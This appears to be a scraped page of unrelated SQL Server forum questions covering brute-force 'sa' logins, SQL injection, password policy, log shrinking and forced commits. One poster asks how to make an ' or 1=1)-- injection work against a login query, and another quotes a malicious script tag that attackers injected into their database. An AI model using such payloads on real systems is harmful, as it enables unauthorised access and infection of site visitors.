In the Application event log I am seeing entries like the
following:
Login failed for user 'sa'. [CLIENT: 60.32.67.85]
Once
every second.
I am assuming this is a brute force password attack, an
ARIN query of the IP address indicates it's from:
Asia Pacific Network Information CentreIs there any way to block this IP from accessing my server?Thanks,Tylerp.s. I tried posting this on MSDN forums, but the site appears to be broken.
Hi to all,
Im looking at the sql server log, and I see a strange behavior.
Im getting at least 5 "sa" login attempts from an sepcific IP address.
How can I avoid this, lock that IP or add a delay to 'sa' failed logins?
Thanks so much
Cristian
It is not uncommon for me to review the event logs of our SQL Server and notice that someone is attempting to figure out the password for one of the SQL user accounts.........especially the "sa" username. But lately our SQL server has to be rebooted to where it is starting to become a nightly thing.
Last night the SQL Server was bombarded with attempted failed connections for 2 hours before it finally gave a blank BSOD. The SQL Server in question is in mixed mode and is a shared server. Strictly using Windows Authentication mode is not an option for us. The server has "beefy" hardware and has all updates and patches.
Sometimes, when I log on the server and notice that an IP address is making such attacks on the server, I put up an IPSEC policy against that IP. But that is not a good solution for reasons I dont think need to be outlined here.
So my question is, what can I do to better protect our SQL Server from these types of attacks? My thought on these attacks is not different than a DDOS that eventually takes the server down.
I have already done TCP/IP Hardening but not sure what else to do.
Thank you all for your replies.
In my product description field, I need to extract the data that looks like
19-3-19 or 0-0-7. Sometimes that pattern is in the data, sometimes not.
I only want those that contain the pattern, of course, but I have no other method of determining whether or not the pattern will be in the description.
I thought I'd found a method that worked, until I encountered descriptions
that had a '-' in it prior to the pattern.
Here's what I have so far, it works for all but the last one.
CREATE TABLE #TMPPROD (
PROD_DESC VARCHAR(60)
)
INSERT INTO #TMPPROD
SELECT '22-4-12 15%SCU'
UNION ALL
SELECT '14-4-8 W/F'
UNION ALL
SELECT 'UFLEXX 17-3-17 2%FE'
UNION ALL
SELECT 'FERT-PEST 19-19-19'
SELECT PROD_DESC, SUBSTRING(PROD_DESC,CHARINDEX('-', PROD_DESC)-CASE WHEN PATINDEX('[0-9]', SUBSTRING(PROD_DESC, CHARINDEX('-', PROD_DESC) - 2,1))<>0 THEN 2
WHEN PATINDEX('[0-9]', SUBSTRING(PROD_DESC, CHARINDEX('-', PROD_DESC) - 1,1))<>0 THEN 1
ELSE 0 END, CHARINDEX('-', SUBSTRING(PROD_DESC,
CHARINDEX('-',PROD_DESC)+1,2))+CASE WHEN PATINDEX('[0-9]', SUBSTRING(PROD_DESC, CHARINDEX('-', PROD_DESC) - 2,1))<>0 THEN 2
WHEN PATINDEX('[0-9]', SUBSTRING(PROD_DESC, CHARINDEX('-', PROD_DESC) - 1,1))<>0 THEN 1
ELSE 0 END+2+CASE WHEN PATINDEX('[0-9]', SUBSTRING(PROD_DESC, CHARINDEX('-', PROD_DESC) +1,2))<>0 THEN 2
WHEN PATINDEX('[0-9]', SUBSTRING(PROD_DESC, CHARINDEX('-', PROD_DESC) - 1,1))<>0 THEN 1
ELSE 0 END) AS 'ANALYSIS'
FROM #TMPPROD
WHERE PROD_DESC LIKE '%-[0-9]%-[0-9]%'
DROP TABLE #TMPPROD
Any pointers on what to try next, or have I severely over-complicated the process - as I am wont to do.
Thanks
Mark
Hello,
I restored a huge ReportServer backup on a dev machine and I do not want the subscriptions and their jobs.
I already changed the SMTP server address so emails will go to nowhere.
Now What is the best sequence to get a rid of all subscriptions?
Delete records (or truncate) from the ReportServer.Subscriptions table then delete all the subscriptions jobs or the other way around?
BTY, a centralized management of subscriptions as well as stuffing all these jobs into a folder would be a welcome addition.
Thanks,
Philippe
I've got a huge inefficiency in my code that I'm trying to fix. I’m coding in VB.NET using ASP.NET and an MSSQL 2000 server.
I’m working in a temporary table that has an identical layout as another, non-temporary table in my database. Once I get the temp table how I want it, I need to insert everything from that table into my main table. Before I can do that, however, I need to delete all the records in the main table with certain fields that match a record’s fields in the temporary table.
Right now, I have a method that builds one delete statement per record in the temporary table and then runs those statements on the main table. Since I’m dealing with the order of 50,000 records (at least) here, building and sending those statements to the server takes forever.
Is there a way I can accomplish the same thing without building and sending such a huge SQL call to the server? If so, how would I go about doing that?
Thanks in advance for whatever help you can give,
-Starwiz
How can you force a password, from a sql login, to expire?
I would like to use the password expiration feature for sql logins in SqlServer 2005. The msdn document provides example code for SqlClient SqlConnection.ChangePassword like in Bob Beauchemin's book. http://msdn2.microsoft.com/en-us/library/system.data.sqlclient.sqlconnection.changepassword.aspx
There is a modify_date in the system view sys.sql_logins but that is read-only.
Thanks,
Karl
Hi,
I need to find out what sql injection attack is, what it does how it is done and how to protect form it....Any through explanation will be much appreciated.
Thanks
Kabir
Hi Recently we moved our site from Access to MS SQL Server 2005 Express on a dedicated server. Guess what.... we came under some attack (may be SQL injection). Our database was manipulated and data's in some field were replaced by "<script src=http://9i5t.cn/a.js></script>" We don't know how it was done .. then i googled around to find any clue . too my surprise i found around 30,000 sites which were affected by this / have a look http://www.google.com/search?hl=en&q=%22http%3A%2F%2F9i5t.cn%2Fa.js%22&btnG=SearchAnd also an interest fact popped up also sites where in ASP But unfortunately no documentation was available for it ... So i wonder if their is any flaw in coding or database permission .. 30,000 webmaster can't go wrong. May be their is security flaw either in SQL Server 2005 or ASP .. can't say As of now i have cleared my database using find and replace function. But i know we might me soon be under attack again Please help me out find out exact reason for it .. Thanks in advanceSuraj jain
View 3 Replies View Relatedhi,
Hope everybody is fine.Well,today I want to know the smartest ways to prevent sql injection attacks.It would be really helpful if anybody gives light to it.
Thanks!!
All,I am trying to test an attack against a web page. The VBScript runs 2queries against the database; the first must succeed before the secondruns. Here is the code:1st-select * from users where (userid=' + @string + ') and password=' +@pwdstring + '2nd-select * from permissions where userid=' + @string + 'When attempting the attack the problem lies in the "(" & ")"surrounding the first userid string in the 1st query. if I attempt toput a ")" in the original @string function to cancel out the first "("it then causes problems for the second string. Also, the @pwdstringgets encrypted before it is sent to the SQL Server, so attempting theattack from that field is useless.For instance:@string = ' or 1=1)--@pwdstring = blank (becomes @pwdstring = 55-12-567-3244-123 due toencryption)select * from users where (userid='' or 1=1)--') andpassword='55-12-567-3244-123' WORKS OKselect * from permissions where userid='' or 1=1)--' DOES NOT WORKIs this an instance where the original developers made a happy codingerror (I asked and preventing injection attacks wasn't intended) or isthere something I can do to circumvent this?Thanks,josh
View 7 Replies View RelatedHello all,
I have a question on whether the following stored precedure would be open to an SQL Injection attack. Assume that a string query would be passed to the SP.
I am told that because the password parameter is only varchar(8) that it is safe.
Can someone prove this wrong?
Thanks....
I have added sample code below.
CREATE TABLE [dbo].[JB_Test](
[Name] [varchar](50) COLLATE SQL_Latin1_General_CP1_CI_AS NOT NULL CONSTRAINT [DF_JB_Test_Name] DEFAULT (''),
[Email] [varchar](100) COLLATE SQL_Latin1_General_CP1_CI_AS NOT NULL CONSTRAINT [DF_JB_Test_Email] DEFAULT (''),
[Password] [varchar](8) COLLATE SQL_Latin1_General_CP1_CI_AS NOT NULL CONSTRAINT [DF_JB_Test_Password] DEFAULT (''),
) ON [PRIMARY]
GO
Insert dbo.JB_Test (Name, Email, Password )
values ('John', 'asdf@asdf.com', '2345')
Insert dbo.JB_Test (Name, Email, Password )
values ('Paul', 'asdf@asdf.com', '2345')
Insert dbo.JB_Test (Name, Email, Password )
values ('Geroge', 'asdf@asdf.com', '2345')
Insert dbo.JB_Test (Name, Email, Password )
values ('Ringo', 'asdf@asdf.com', '2345')
GO
Create procedure dbo.JB_Test_Login
@Username varchar(100),
@Password varchar(8)
AS
select Name
from dbo.JB_Test
where Name = @Username
and Password = @Password
GO
--Clean Up Your Mess
--Drop procedure dbo.JB_Test_Login
--GO
--Drop Table dbo.JB_Test
--GO
JBelthoff
• Hosts Station is a Professional Asp Hosting Provider
• Position SEO can provide your company with SEO Services at an affordable price
› As far as myself... I do this for fun!
Hello Every one,
can any one please let me know what is below mentioned errors i found on my newly installed sql server and also let me know severiarity of this and if you know the solution for this i would wel come all your suggestion.
12/24/2006 05:48:47,Logon,Unknown,Error: 18456<c/> Severity: 14<c/> State: 8.,
12/24/2006 05:48:45,Logon,Unknown,Login failed for user 'sa'. [CLIENT: 204.10.60.17],
12/24/2006 05:48:45,Logon,Unknown,Error: 18456<c/> Severity: 14<c/> State: 8.,
12/24/2006 05:48:44,Logon,Unknown,Login failed for user 'sa'. [CLIENT: 204.10.60.17],
12/24/2006 05:48:44,Logon,Unknown,Error: 18456<c/> Severity: 14<c/> State: 8.,
12/24/2006 05:48:41,Logon,Unknown,Login failed for user 'sa'. [CLIENT: 204.10.60.17],
12/24/2006 05:48:41,Logon,Unknown,Error: 18456<c/> Severity: 14<c/> State: 8.,
12/24/2006 05:48:40,Logon,Unknown,Login failed for user 'sa'. [CLIENT: 204.10.60.17],
12/24/2006 05:48:40,Logon,Unknown,Error: 18456<c/> Severity: 14<c/> State: 8.,
12/24/2006 05:48:40,Logon,Unknown,Login failed for user 'sa'. [CLIENT: 204.10.60.17],
12/24/2006 05:48:40,Logon,Unknown,Error: 18456<c/> Severity: 14<c/> State: 8.,
12/24/2006 05:48:39,Logon,Unknown,Login failed for user 'sa'. [CLIENT: 204.10.60.17],
12/24/2006 05:48:39,Logon,Unknown,Error: 18456<c/> Severity: 14<c/> State: 8.,
12/24/2006 05:48:39,Logon,Unknown,Login failed for user 'sa'. [CLIENT: 204.10.60.17],
12/24/2006 05:48:39,Logon,Unknown,Error: 18456<c/> Severity: 14<c/> State: 8.,
12/24/2006 05:48:35,Logon,Unknown,Login failed for user 'sa'. [CLIENT: 204.10.60.17],
12/24/2006 05:48:35,Logon,Unknown,Error: 18456<c/> Severity: 14<c/> State: 8.,
12/24/2006 05:48:35,Logon,Unknown,Login failed for user 'sa'. [CLIENT: 204.10.60.17],
12/24/2006 05:48:35,Logon,Unknown,Error: 18456<c/> Severity: 14<c/> State: 8.,
12/24/2006 05:48:34,Logon,Unknown,Login failed for user 'sa'. [CLIENT: 204.10.60.17],
12/24/2006 05:48:34,Logon,Unknown,Error: 18456<c/> Severity: 14<c/> State: 8.,
12/24/2006 05:48:34,Logon,Unknown,Login failed for user 'sa'. [CLIENT: 204.10.60.17],
12/24/2006 05:48:34,Logon,Unknown,Error: 18456<c/> Severity: 14<c/> State: 8.,
12/24/2006 05:48:33,Logon,Unknown,Login failed for user 'sa'. [CLIENT: 204.10.60.17],
12/24/2006 05:48:33,Logon,Unknown,Error: 18456<c/> Severity: 14<c/> State: 8.,
12/24/2006 05:48:33,Logon,Unknown,Login failed for user 'sa'. [CLIENT: 204.10.60.17],
12/24/2006 05:48:33,Logon,Unknown,Error: 18456<c/> Severity: 14<c/> State: 8.,
12/24/2006 05:48:32,Logon,Unknown,Login failed for user 'sa'. [CLIENT: 204.10.60.17],
12/24/2006 05:48:32,Logon,Unknown,Error: 18456<c/> Severity: 14<c/> State: 8.,
12/24/2006 05:48:32,Logon,Unknown,Login failed for user 'sa'. [CLIENT: 204.10.60.17],
12/24/2006 05:48:32,Logon,Unknown,Error: 18456<c/> Severity: 14<c/> State: 8.,
12/24/2006 05:48:31,Logon,Unknown,Login failed for user 'sa'. [CLIENT: 204.10.60.17],
12/24/2006 05:48:31,Logon,Unknown,Error: 18456<c/> Severity: 14<c/> State: 8.,
12/24/2006 05:48:31,Logon,Unknown,Login failed for user 'sa'. [CLIENT: 204.10.60.17],
12/24/2006 05:48:31,Logon,Unknown,Error: 18456<c/> Severity: 14<c/> State: 8.,
12/24/2006 05:48:30,Logon,Unknown,Login failed for user 'sa'. [CLIENT: 204.10.60.17],
12/24/2006 05:48:30,Logon,Unknown,Error: 18456<c/> Severity: 14<c/> State: 8.,
12/24/2006 05:48:30,Logon,Unknown,Login failed for user 'sa'. [CLIENT: 204.10.60.17],
12/24/2006 05:48:30,Logon,Unknown,Error: 18456<c/> Severity: 14<c/> State: 8.,
12/24/2006 05:48:29,Logon,Unknown,Login failed for user 'sa'. [CLIENT: 204.10.60.17],
12/24/2006 05:48:29,Logon,Unknown,Error: 18456<c/> Severity: 14<c/> State: 8.,
12/24/2006 05:48:29,Logon,Unknown,Login failed for user 'sa'. [CLIENT: 204.10.60.17],
12/24/2006 05:48:29,Logon,Unknown,Error: 18456<c/> Severity: 14<c/> State: 8.,
12/24/2006 05:48:28,Logon,Unknown,Login failed for user 'sa'. [CLIENT: 204.10.60.17],
12/24/2006 05:48:28,Logon,Unknown,Error: 18456<c/> Severity: 14<c/> State: 8.,
12/24/2006 05:48:27,Logon,Unknown,Login failed for user 'sa'. [CLIENT: 204.10.60.17],
12/24/2006 05:48:27,Logon,Unknown,Error: 18456<c/> Severity: 14<c/> State: 8.,
since last so many days i found that these kind of errors on sql server 2005.It occurs contineously so it keeps server busy all the time.
I have attached a portion of this error log.Thanks for all your help and the time you took to look at my question.
Thanks,
Bharat.
I like this forum but recently I have noticed they are running ads with sound effects.
I like a lot of programmers I know listen to music through their computer with headphones on all day. Whenever one of those adds fire off it about scares the BeJesus of me and comes through louder than the music. I am playing with my settings but I each time I find one that kills the sound effects it kills the music too.
Starting to make me mad.
I have connected to Database using my credentials by checking remember password option. After few days I forgot my password. How can I recover the password as SQL remember it. Is there any way to recover my password instead of resetting it.
View 3 Replies View RelatedI have a package protected by a password - I am already unhappy that to get it to use the configuration file to change connection strings for the production servers I have had to hardcode the password into the config file - very insecure!
However, the package now deploys correctly to the production server and will run from there OK, but NOT if scheduled as a SQL Server Agent Job. Thus is because however often I edit the command line to include the password after the DECRYPT switch (which it has prompted me for when I click on the command line tab), the Job Step will not retain it.
If I open it up after I have edited it and closed it, the password has disappeared.
I know that if I run dtexec plus the code in the Command Line tab (with the password), the package runs OK.
This is driving me insane!
I have read all the other posts and so I tried replacing the SSIS package step with a CmdExec step and pasting that code into there - then I get an OLEDB error..
The code I use is:
DTEXEC /SQL "ImportRateMonitoringTables" /SERVER servername /DECRYPT password /CONFIGFILE "D:Microsoft SQL ServerSSISDeploymentsRateMonitoringImportTasksDeploymentImportRateMonitoringTables_Production.dtsConfig" /MAXCONCURRENT " -1 " /CHECKPOINTING OFF /REPORTING E
and I get
SSIS Error Code DTS_E_OLEDBERROR. An OLE DB error has occurred. Error code: 0x8000FFFF
although the same code executes perfectly from a command prompt.
Please does anyone have any experience with a similar problem and if so, how did you get round it?
Thank you
I am receiving the following error message when attempting to create a new SQL Authenticated login id.
Password validation failed. The password does not meet the requirements of the password filter DLL. (Microsoft SQL Server, Error: 15119)
I have four servers all running SQL Server 2005 SP2 on Windows 2003 Ent. SP1. Of the four servers, only one received the above error message using the same TSQL below.
CREATE LOGIN TEST_LOGIN WITH PASSWORD = 'pvif9dal' MUST_CHANGE, CHECK_EXPIRATION = ON
All four servers are in the same domain, which if I understand correctly, the password policies are therefore inherited at the OS level by the domain. The password being used is within the password policies of the domain.
Any ideas as to a root cause?
Hi all,
I have a case of sqlslammer.worm virus on my DB server. I have run Mcafee antivirus software but the virus cannot be removed.
Please can anyone tell me how to getit off my server?
Leonard
I tried to install an ALLDATA database which run with SQL Server 2005 express edition. The data base fails to install becase of the following code that come up which is related to AS password requirement. The error that come up is:
TITLE: Microsoft SQL Server 2005 Setup
------------------------------
The sa password must meet SQL Server password policy requirements. For strong password guidelines, see Authentication Mode, in SQL Server Books Online.
For help, click: http://go.microsoft.com/fwlink?LinkID=20476&ProdName=Microsoft+SQL+Server&ProdVer=9.00.2047.00&EvtSrc=setup.rll&EvtID=28001&EvtType=sqlca%5csqlcax.cpp%40SAPasswordPolicyCheck%40SAPasswordPolicyCheck%40x6d61
------------------------------
BUTTONS:
&Retry
Cancel
------------------------------
I am trying to install this database in a network server operating under Windows Server 2003 R2 with SP2. If anyone knows how to solve this problem, please let me.
Thanks,
Amilcar
On the login prompt for Report Server, there is a checkbox option to "Remember my Password." I check this, login successfully... but when returning to the Report Server, I am again prompted for the password, although the user name is saved. No matter how many times I do this, the password will not save in IE7. I have tried this on 3 different computers with IE7. In IE 6, I do not even get the checkbox as an option, just the user name/password prompt. In Firefox, the password saves fine. Any ideas what would be causing this?
Thanks,
Brian
I put this together to export the user name /password to a csv file to test my SP to output the user name/password.
DECLARE @user_name varchar(50)
DECLARE @psswrd varchar(10)
SELECT @user_name ,@psswrd
FROM ngweb_bulk_enrollments
EXEC master.dbo.xp_cmdshell 'bcp NGDevl.dbo.ngweb_bulk_enrollments out C: est.csv -Sserver1 -T -t, -r
-c'
This works but I don't get the headers in the file. How can I include the headers?
Hi
I need to detach a Database, but with "EXEC sp_detach_db 'test','false'" I can't do this because it is in use.
Is there a Possibility to make a "force detach" or something?
Thanks for Help
Greets
Id like to know how I force the transaction log to shrink in v2000?
I have sp_force_shrink_log but this only works in v7.
... Also, how do I set the log to truncate on checkpoint?
Many thanks,
Lauryn
How to force the primary key for a table to begin at a set Primary Id and not standard count (1,2,3,4,5..10,11,12) etc.
Pretty much how to force it being on number I would like to begin.
Hi All
Forgive my ignorance. I have been told you cannot run a force restore without SQL Agent running? Is that so?
Also, is it possible to execute a force restore from a command line. If so, how would you go about do this.
I ask these questions because recently our database and MSBD files became corrupted and couldn't restore them in the normal way. Had to manually rebuild MSDB file.
Thanks
I have a script or SP that takes a very long time to performmultiple tasks, and after each one there is a PRINT statementthat shows the time and what was just accomplished, to help memonitor what's happening and estimate how long it will take.In a script, I can put a GO after each PRINT to cause the outputto appear immediately, but that's not possible inside an SP.Instead, it seems the output goes to a buffer, and the bufferis only output when a PRINT causes the buffer to become full.Sometimes there is a long delay before the buffer fills. Isthere a way other than GO to cause immediate printing? (Iguess I could just use longer messages, and fill up thebuffer with every one, but that's not very elegant.)Thanks,Jim GCountrywide Home Loans
View 2 Replies View RelatedI've a complex stored procedure, that makes a lot of insert, update,delete and so on.I would like to make some commits durint this sp, but of course theyare not "real" commit because who call the sp could decide for arollback.But I know that this commit has to be real. In fact, the transactionlog grows really too much during the execution.Is there a way to force a commit durint a sp ?thank you very much!
View 3 Replies View RelatedI set up odbc to link to sql express from access 2003, using sql authentication to force a login, and did not click 'save password'. when i open up access again, and open table, it goes right in without a login. How can I set so it does a login, at least each time Access opens?
View 1 Replies View RelatedI want to configure SQL 2k5 Express so that all connections are
encrypted. I've found the documentation that gives the How-To steps,
but I don't see the SSL option in the Network Configuration.
Is this possible with the Express edition?
Do I need to do something special with the installation?
Thanks,
OldSam
Hi,
My data flow has several transformations:
1. Search an employee, if the employee already exists, update it, otherwise insert it.
2. Once the new employee is created, i have to get its id (with another search transformation )to update another table with it. This id is an autonumeric , thats the reason i have to get it once the record is inserted.
At this momment this second search transformation to get the assigned id for the new reacord doesnt find any employee... i suppose its because these new data is not commited in the database....
the question is, Its possible to force a commit?
Thanks!
I have a application that runs non-parameterized queries against SQL, that are filling my proc cache. The most common one is like the below:
Code Snippet
DELETE FROM Item_Temp WHERE SessionID = '1232345'
The numeric value of the SessionID changes for every time it runs. How do I force parameterization of this without changing the application code?
I have a report that has multiple graphs on it. I would like to force a page break (new page) in between the different reports causing a report to be generated on it own page. Im assuming that Im missing something here because it seems like a easy/usable feature. Any help would be great.
Thanks,
ZDB
Hi,
I have a package that goes out and picks up a file off of a ftp server using the ftp task. How do I force the package to stop running if the file is not there?